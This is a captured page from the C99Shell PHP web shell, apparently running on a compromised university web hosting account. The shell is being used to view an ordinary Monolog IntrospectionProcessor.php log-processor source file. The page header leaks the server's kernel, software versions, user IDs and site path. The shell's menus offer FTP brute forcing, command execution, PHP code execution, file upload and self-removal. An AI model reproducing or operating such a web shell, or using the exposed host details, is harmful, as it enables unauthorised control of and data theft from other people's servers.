!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.22 (Debian). PHP/5.6.36 

uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 

uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) 

Safe-mode: OFF (not secure)

/home/h33678/data/www/it-man.ztu.edu.ua/src/vendor/monolog/monolog/src/Monolog/Processor/   drwxr-xr-x
Free 116.6 GB of 200.55 GB (58.14%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     IntrospectionProcessor.php (3.17 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
 * This file is part of the Monolog package.
 *
 * (c) Jordi Boggiano <j.boggiano@seld.be>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace Monolog\Processor;

use 
Monolog\Logger;

/**
 * Injects line/file:class/function where the log message came from
 *
 * Warning: This only works if the handler processes the logs directly.
 * If you put the processor on a handler that is behind a FingersCrossedHandler
 * for example, the processor will only be called once the trigger level is reached,
 * and all the log records will have the same file/line/.. data from the call that
 * triggered the FingersCrossedHandler.
 *
 * @author Jordi Boggiano <j.boggiano@seld.be>
 */
class IntrospectionProcessor
{
    private 
$level;

    private 
$skipClassesPartials;

    private 
$skipStackFramesCount;

    private 
$skipFunctions = array(
        
'call_user_func',
        
'call_user_func_array',
    );

    public function 
__construct($level Logger::DEBUG, array $skipClassesPartials = array(), $skipStackFramesCount 0)
    {
        
$this->level Logger::toMonologLevel($level);
        
$this->skipClassesPartials array_merge(array('Monolog\\'), $skipClassesPartials);
        
$this->skipStackFramesCount $skipStackFramesCount;
    }

    
/**
     * @param  array $record
     * @return array
     */
    
public function __invoke(array $record)
    {
        
// return if the level is not high enough
        
if ($record['level'] < $this->level) {
            return 
$record;
        }

        
$trace debug_backtrace(DEBUG_BACKTRACE_IGNORE_ARGS);

        
// skip first since it's always the current method
        
array_shift($trace);
        
// the call_user_func call is also skipped
        
array_shift($trace);

        
$i 0;

        while (
$this->isTraceClassOrSkippedFunction($trace$i)) {
            if (isset(
$trace[$i]['class'])) {
                foreach (
$this->skipClassesPartials as $part) {
                    if (
strpos($trace[$i]['class'], $part) !== false) {
                        
$i++;
                        continue 
2;
                    }
                }
            } elseif (
in_array($trace[$i]['function'], $this->skipFunctions)) {
                
$i++;
                continue;
            }

            break;
        }

        
$i += $this->skipStackFramesCount;

        
// we should have the call source now
        
$record['extra'] = array_merge(
            
$record['extra'],
            array(
                
'file'      => isset($trace[$i 1]['file']) ? $trace[$i 1]['file'] : null,
                
'line'      => isset($trace[$i 1]['line']) ? $trace[$i 1]['line'] : null,
                
'class'     => isset($trace[$i]['class']) ? $trace[$i]['class'] : null,
                
'function'  => isset($trace[$i]['function']) ? $trace[$i]['function'] : null,
            )
        );

        return 
$record;
    }

    private function 
isTraceClassOrSkippedFunction(array $trace$index)
    {
        if (!isset(
$trace[$index])) {
            return 
false;
        }

        return isset(
$trace[$index]['class']) || in_array($trace[$index]['function'], $this->skipFunctions);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.0401 ]--